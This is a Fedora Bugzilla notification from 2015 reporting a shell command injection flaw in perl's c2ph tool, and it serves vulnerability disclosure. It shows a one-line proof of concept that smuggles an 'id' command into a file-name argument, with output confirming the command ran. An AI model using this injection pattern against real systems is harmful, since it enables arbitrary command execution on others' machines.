[Bug 1210614] New: Shell command injection in c2ph tool

Fri Apr 10 08:13:36 UTC 2015

https://bugzilla.redhat.com/show_bug.cgi?id=1210614

            Bug ID: 1210614
           Summary: Shell command injection in c2ph tool
           Product: Fedora
           Version: 21
         Component: perl
          Assignee: jplesnik at redhat.com
          Reporter: ppisar at redhat.com
        QA Contact: extras-qa at fedoraproject.org
                CC: cweyl at alumni.drew.edu, iarnell at gmail.com,
                    jplesnik at redhat.com, kasal at ucw.cz,
                    perl-devel at lists.fedoraproject.org, ppisar at redhat.com,
                    psabata at redhat.com, rc040203 at freenet.de,
                    tcallawa at redhat.com

The c2ph suffers from shell command injection:

$ c2ph -n '; id; x.c'
cc: fatal error: no input files
compilation terminated.
uid=500(petr) gid=500(petr) groups=500(petr),63(audio),100(users),478(mock)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh: x.c: command not found

Tested with perl-5.18.4-308.fc21.x86_64.

Reported to upstream <https://rt.perl.org/Ticket/Display.html?id=124275>.

-- 
You are receiving this mail because:
You are on the CC list for the bug.